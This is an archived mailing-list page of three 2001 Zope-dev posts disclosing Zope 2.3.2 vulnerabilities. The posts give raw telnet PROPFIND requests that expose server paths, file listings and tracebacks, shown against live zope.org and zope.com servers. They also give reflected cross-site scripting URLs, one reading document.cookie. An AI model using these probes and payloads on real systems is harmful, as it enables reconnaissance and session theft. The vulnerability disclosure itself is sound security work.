from:"ALife"

[Zope-dev] Vulnerability in Zope

2001-09-23 Thread ALife


Found vulnerability: retrieve a full path to local files in Zope.

---[ Example 1 (Linux):

telnet www.zope.org 80

PROPFIND / HTTP/1.0

F
G
H
J
K
L
HTTP/1.0 500 Internal Server Error
Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1
Date: Mon, 10 Sep 2001 15:38:59 GMT
Content-Length: 7058
Ms-Author-Via: DAV
Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/Property
Sheets.py
Bobo-Exception-Type: TypeError
Content-Length: 7058
Ms-Author-Via: DAV
Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/Property
Sheets.py
Bobo-Exception-Type: TypeError
Content-Type: text/html
Bobo-Exception-Value: !DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//
EN http://www.w3.org/TR/REC-html40/loose.dtd; HTML  HEAD  TITLEWelcome
to Zope.org/TITLE   link rel=stylesheet href=http://www.zope.org/zope_css;
 type=text/css   /HEAD   BODY B
Bobo-Exception-Line: 369


...


 !--
 Traceback (innermost last):
  File /usr/local/base/Zope-2.3.2-modified/l
ib/python/ZPublisher/Publish.py, line 223, in publish_module
  File /usr/local/ba
se/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 187, in publish
   F
ile /usr/local/base/Zope-2.3.2-modified/lib/python/Zope/__init__.py, line 221, i
n zpublisher_exception_hook
   (Object: ApplicationDefaultPermissions)
File /us
r/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 171, in
publish
 File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/mapply.p
y, line 160, in mapply
  (Object: PROPFIND)
  File /usr/local/base/Zope-2.3.2-mo
dified/lib/python/ZPublisher/Publish.py, line 112, in call_object
 (Object: PR
OPFIND)
 File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/Resource.py,
 line 222, in PROPFIND
  (Object: ApplicationDefaultPermissions)
   File /usr/loc
al/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply
  Fi
le /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, i
n apply
 File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py,
line 219, in apply
File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/d
avcmds.py, line 219, in apply
   File /usr/local/base/Zope-2.3.2-modified/lib/pyth
on/webdav/davcmds.py, line 175, in apply
  File /usr/local/base/Zope-2.3.2-modifi
ed/lib/python/OFS/PropertySheets.py, line 369, in dav__allprop
  (Object: Virtu
al)
   TypeError: (see above)

 --
Host has closed connection.

---[ Example 2 (Linux):
telnet www.zope.com 80

 / HTTP/1.0
or NOTREALCOMMAND / HTTP/1.0


HTTP/1.0 404 Not Found
Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1
Date: Fri, 21 Sep 2001 12:51:48 GMT
Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/H
TTPResponse.py
Content-Type: text/html
Bobo-Exception-Type: NotFound
Bobo-Exception-Value: !DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//
EN http://www.w3.org/TR/REC-html40/loose.dtd; HTML  HEAD  TITLEWelcome
to Zope.org/TITLE   link rel=stylesheet href=http://www.zope.org/zope_css;
 type=text/css   /HEAD   BODY B
Content-Length: 5845
Bobo-Exception-Line: 547

 ... 

 !--
 Traceback (innermost last):
  File /
usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 223, i
n publish_module
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher
/Publish.py, line 187, in publish
   File /usr/local/base/Zope-2.3.2-modified/lib/
python/Zope/__init__.py, line 221, in zpublisher_exception_hook
   (Object: Appl
icationDefaultPermissions)
File /usr/local/base/Zope-2.3.2-modified/lib/python/
ZPublisher/Publish.py, line 173, in publish
 File /usr/local/base/Zope-2.3.2-mod
ified/lib/python/ZPublisher/HTTPResponse.py, line 308, in setBody
   File /usr/loc

[Zope-dev] New: Cross Site Scripting vulnerability

2001-09-23 Thread ALife



Example:

http://www.zope.org/Documentation/SCRIPTalert(document.domain)/SCRIPT
http://www.zope.org/lalalalalSCRIPTalert(document.domain)/SCRIPT
http://www.zope.org/SCRIPTalert(document.cookie)/SCRIPT

For  example, an attacker might post a message like

Hello message board. This is a message.
   SCRIPTmalicious code/SCRIPT
This is the end of my message.

When a victim with scripts enabled  in their  browser reads this
message,  the  malicious  code   may  be  executed   unexpectedly.
Scripting tags that can be embedded in this way include SCRIPT,
OBJECT, APPLET, and EMBED.



___
Zope-Dev maillist  -  [EMAIL PROTECTED]
http://lists.zope.org/mailman/listinfo/zope-dev
**  No cross posts or HTML encoding!  **
(Related lists - 
 http://lists.zope.org/mailman/listinfo/zope-announce
 http://lists.zope.org/mailman/listinfo/zope )

[Zope-dev] Vulnerability: attacking can get file list and directory

2001-09-23 Thread ALife


Vulnerability: attacking can get file list and directory
Tested on Win32 platform

Example:
telnet zopeserver 8080
PROPFIND / HTTP/1.0
enter
enter
enter

 list files and directory 

This tested on my site:
security.instock.ru 8080


___
Zope-Dev maillist  -  [EMAIL PROTECTED]
http://lists.zope.org/mailman/listinfo/zope-dev
**  No cross posts or HTML encoding!  **
(Related lists - 
 http://lists.zope.org/mailman/listinfo/zope-announce
 http://lists.zope.org/mailman/listinfo/zope )

[Zope-dev] Vulnerability in Zope

[Zope-dev] New: Cross Site Scripting vulnerability

[Zope-dev] Vulnerability: attacking can get file list and directory

3 matches

Site Navigation

Mail list logo

Footer information